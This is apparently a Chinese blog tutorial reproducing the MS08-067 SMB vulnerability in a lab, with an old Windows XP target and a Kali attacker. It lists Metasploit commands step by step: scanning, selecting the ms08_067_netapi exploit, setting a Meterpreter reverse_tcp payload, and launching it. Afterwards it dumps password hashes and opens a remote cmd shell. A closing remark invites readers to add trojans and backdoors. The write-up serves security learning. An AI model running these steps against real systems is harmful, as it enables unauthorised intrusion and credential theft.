MS08-067漏洞重现

(1):MS08-067远程溢出漏洞描述

MS08-067漏洞的全称为“Windows Server服务RPC请求缓冲区溢出漏洞”,如果用户在受影响的系统上收到特制的 RPC 请求,则该漏洞可能允许远程执行代码。在 Microsoft Windows 2000Windows XP 和 Windows Server 2003 系统上,攻击者可能未经身份验证即可利用此漏洞运行任意代码,此漏洞可用于进行蠕虫攻击,目前已经有利用该漏洞的蠕虫病毒。防火墙最佳做法和标准的默认防火墙配置,有助于保护网络资源免受从企业外部发起的攻击,默认情况下能建立空连接。

(2) :查询MS08-067是否存在于目标靶机上:

重现此实验在局域网中实行,目标靶机是:windows  xp,(注:此xp系统是2001年版本的,在msdn上下载的!)攻击机:kali-linux1.0.9;

可以先通过nmap扫描工具去扫描目标主机的端口及目标系统存在的高位漏洞,作为渗透测试的第一步:信息收集!在metasploit中调用nmap插件--script=smb-check-vulns:命令执行如下:

存在漏洞的标志:(ms08-067)

nmap扫描的结果里报告发现MS08-067:DISABLED。 这是在暗示我们或许能够对这台主机进行渗透攻击,然后我们在 Metasloit里面找到此漏洞的攻击模块,并尝试攻击目标机器。MS08-067是一个对操作系统版本依赖非常高的漏洞,所以在这里,我们只自动payload指定一下目标就可以确保触发正确的溢出代码。

(3)搭建环境过程及原理分析:

1>开启xp和kali,并配置ip在同一网段(检查ping通即可);我的因为是内网,所以有ip划分的因素导致看起来不在同一网段,其实就在同一网段的;

Xp:172.25.0.95:  255.255.252.0:   网关:172.25.3.254

Kali:172.25.3.3:   255.255.252.0:   网关:172.25.3.254

2>kali开启metasploit;这个通过选项applications>kali linux>system service>metasploit>metasploit start.(执行结束如下图所示:)(注:第一段是指框架默认首先开启kali集成的postgresql数据库,第二段和第三是开启metasploit框架服务的)

3>进入metasploit的msfconsole控制台:命令msfconsole;(此过程可能得2-5分钟,因为它是在加载一些模块等等)。接着你会看到友好的欢迎页面:

4>在msf>提示符下:输入search  ms08-067;查找与其相关的漏洞攻击程序;(重要信息都在红圈标记中:下面同上,就不一一提示了!)

5>输入使用该漏洞攻击程序:命令:use exploit/windows/smb/ms08_067_netapi;执行结束后如下:

6>如上我们已经驾驭了(ms08_067_netapi)这个漏洞攻击程序,哈哈!接下来我们要找一找metasploit下的有效攻击荷载(payload),那就使用命令:show  payloads来查找一下吧!

本来选择如图中标记的的payload,但是为了结合书上作者第二个:meterpreter(注:这是一个metasploit框架下强大的payload)的演示我改做下面的payload,其实目的是为了显示更多的效果(ps:新手不就是为了多看到点效果么,才能杨样自得!哈哈,扯远了,就是让大家玩玩,真正的黑客可是不玩这些小伎俩的哦 QWQ);执行如下:

7>既然找到了上图的payload,那就不妨尝试一下:使用命令:set payload windows/meterpreter/reverse_tcp; 执行如下:

8>完成渗透攻击模块与攻击载荷模块的选择之后,需要查看配置渗透攻击所需的配置选项,具体命令如下:show options(方块中是空的?我在这里解释一下:RHOST:表示靶机的ip地址,我们还没设置,但是不要着急,随后设置;LHOST:肯定读者会想到这是攻击主机的ip了吧?对,读者很聪明,答案是肯定的,就是攻击主机的ip,另外,别的选项读者也可以自己试着理解一下,我就不在这里一一解释了,相信聪明的你应该可以想到!)

9>now,现在我们需要设置ip咯,设置命令:set RHOST  172.25.0.95

Set LHOST  172.25.3.3;如下所示:

10>设置完成之后我们需要知道目标靶机的系统类型,现在去查询这个payload有多少种可攻击的系统:show targets

哇!!!不错,竟然有67种的系统去攻击,那么我们应该选择哪个目标呢?不要着急,可能你不太明白你的xp到底是属于如上67种的哪一个,但你可以选择一个默认的哦;给你看:

11>你可以选择target 0,因为它是自动帮你匹配的,多省事啊!执行如下命令选择目标:set target 0

12>现在呢,我们基本已设置完成,接下来我们show一下看看自己的配置都在不?确认一下信息:(看到了吧,我们的配置没问题吧!Ip都有了啊!!!)

13>接下来就是见证奇迹的时刻了,哈哈卖个关子!!!,开始攻击:命令:exploit

吼吼!!!成功了!!!已成功拿下对方主机,那么现在你要做什么呢?好的,告诉你一句话:好戏开锣咯···

(4)是时候让你体验一下当黑客的感觉了!Hello,hacker

1>做到这里接下来就希望你能照着书上的去实现了,苦于你没机会展示的机会来了,还等什么呢?好吧,废话少说第一个“破坏”玩起!哈哈;(但是本人更喜欢从最后一个:实例5玩起!!!)

实例5:获得目标系统的屏幕截图:

(可以读懂么,它把截图放在你kali的root路径下了,我拿出来你看看)

实例4:获得系统当前的进程列表:

实例3:获得当前的工作目录和用户id:

实例2:获得目标系统的password hash(密码哈希:ps:这个我们在密码学中会学到的。。。)

实例1:获得目标系统的DOS shell:(PS:这才是黑客所关注的东西,因为有了它,什么木马,后门之类的东西都变得容易起来啦!)让我们一起来看看这个神奇的东西吧!!!

怎么样?简单的一个命令我们就拿到对方的cmd控制台了吧?爽不爽?哈哈。。。为了让你更加大开眼见,我准备了实例0来让你一爽到底···

实例0:那我就和靶机简单比较一下命令:ipconfig/all吧!!!

从靶机拿到的ipconfig/all:(简单解释一下啊kali截图中所有问号问题:那是因为汉字编码问题:可能是UTF-8的缘故吧!!!)

(5)总结:是时候结束演示了,所有的东西总是不会尽善尽美,读者想要看到的木马,后门之类的功能我并没有实现,原因是本人也是渣渣,望理解,不过这也为读者带去兴趣去搞搞了,或许你就可以实现更高级的功能,我也继续努力希望有一天可以呈现给读者是更高级的漏洞攻击!嗯,衷心的希望和读者一起努力,共筑计算机世界的安全!!!

参考文献:

《渗透测试实践指南》   (美)Patrick  Engebretson著;

《网络攻防技术》       武晓飞 著;

《Metasploit渗透测试魔鬼训练营》     诸葛建伟 著;

《kali-linux渗透测试的艺术》      (英)Lee  Allen;

ms08-067漏洞的复现的更多相关文章

  1. Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程

    v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VM ...

  2. phpStudy后门漏洞利用复现

    phpStudy后门漏洞利用复现 一.漏洞描述 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache.PHP.MySQL.phpMyAdmin.ZendOptimiz ...

  3. JBOSS中间件漏洞总汇复现

    JBOSS中间件漏洞总汇复现 JBoss JMXInvokerServlet 反序列化漏洞 漏洞复现 直接使用docker搭建的漏洞环境. 环境搭建完成后,直接使用工具检测即可:工具下载地址https ...

  4. ThinkCMF X1.6.0-X2.2.3框架任意内容包含漏洞分析复现

    ThinkCMF X1.6.0-X2.2.3框架任意内容包含漏洞分析复现 一.ThinkCMF简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理系统框架,底层采用ThinkPHP3. ...

  5. 泛微e-cology OA系统远程代码执行漏洞及其复现

    泛微e-cology OA系统远程代码执行漏洞及其复现 2019年9月19日,泛微e-cology OA系统自带BeanShell组件被爆出存在远程代码执行漏洞.攻击者通过调用BeanShell组件中 ...

  6. Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现

    Apache ActiveMQ序列化漏洞(CVE-2015-5254)复现 一.漏洞描述 该漏洞源于程序没有限制可在代理中序列化的类.远程攻击者可借助特制的序列化的java消息服务(JMS)Objec ...

  7. CVE-2019-0708漏洞利用复现

    CVE-2019-0708漏洞利用复现 距离这个漏洞爆出来也有好几个月了,之前一直忙也没来得及写文档,现在重新做一遍. 准备环境: win7靶机 IP地址:172.16.15.118 Kali攻击机 ...

  8. MS17-010漏洞利用复现

    MS17-010漏洞利用复现 准备环境: win7靶机 IP地址:172.16.15.118 Kali攻击机 IP地址:172.16.15.50 首先我们需要查看一下靶机是否开启445端口 打开kal ...

  9. CVE-2020-7245 CTFd v2.0.0 – v2.2.2漏洞分析复现

    CVE-2020-7245 CTFd v2.0.0 – v2.2.2漏洞分析复现 一.漏洞介绍 ​ 在 CTFd v2.0.0 - v2.2.2 的注册过程中,如果知道用户名并在 CTFd 实例上启用 ...

  10. ThinkCMF框架任意内容包含漏洞分析复现(写入shell+文件包哈)

    ThinkCMF框架任意内容包含漏洞分析复现 0x00 简介 ThinkCMF是一款基于PHP+MYSQL开发的中文内容管理框架,底层采用ThinkPHP3.2.3构建.ThinkCMF提出灵活的应用 ...

随机推荐

  1. 【洛谷 P2764】 最小路径覆盖问题(最大流)

    题目链接 首先有\(n\)条路径,每条路径就是一个点,然后尽量合并,答案就是点数-合并数. 套路拆点,源连入,出连汇,原有的边入出连. 最大流就是最大合并数,第一问解决. 然后怎么输出方案? 我是找到 ...

  2. 【leetcode 简单】第十五题 加一

    给定一个非负整数组成的非空数组,在该数的基础上加一,返回一个新的数组. 最高位数字存放在数组的首位, 数组中每个元素只存储一个数字. 你可以假设除了整数 0 之外,这个整数不会以零开头. 示例 1: ...

  3. css3同心圆闪烁扩散效果

    <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" ...

  4. python mysql参数化查询防sql注入

    一.写法 cursor.execute('insert into user (name,password) value (?,?)',(name,password)) 或者 cursor.execut ...

  5. MSSQL 详解SQL Server连接(内连接、外连接、交叉连接)

    在查询多个表时,我们经常会用“连接查询”.连接是关系数据库模型的主要特点,也是它区别于其它类型数据库管理系统的一个标志. 什么是连接查询呢? 概念:根据两个表或多个表的列之间的关系,从这些表中查询数据 ...

  6. SpringMVC可以配置多个拦截后缀*.action和.do等

    首先介绍一下.do和.action的区别: struts早期的1版本,以.do为后缀. 同时spring的MVC也是以.do为后缀. 几年前struts收购鼎鼎大名的webwork2和开发团队后,将w ...

  7. Thinkphp的CURD

    CURD即(Create Update Read Delete)其实也就是等同于增删改查. C:Create 创建数据  对数据的添加 Create$m=new Model('User');$m=M( ...

  8. 摘: 给Shapre命名

    有两种解决方式: 在 VBA 中将slide中的Shape命名,改变shape.name即可. 另外一种方式就是有点投机取巧:你可以点击shap,右键选择web/alternativetext做些标记 ...

  9. Ubuntu 17.10 安装 “爱壁纸” 时,缺失了 python-support 依赖

    Ubuntu 17.10 安装 "爱壁纸" 的 deb 包时,缺失了 python-support 依赖.使用  sudo apt-get -f install 也没修复.查了下官 ...

  10. (转)USB协议简介

    USB协议简介     USB是一种协议总线,即主机与设备之间的通信需要遵循一系列约定.协议内容较多,这里仅作一些简单介绍,深入学习,可参看USB规范(WWW.usb.org).     为了理解协议 ...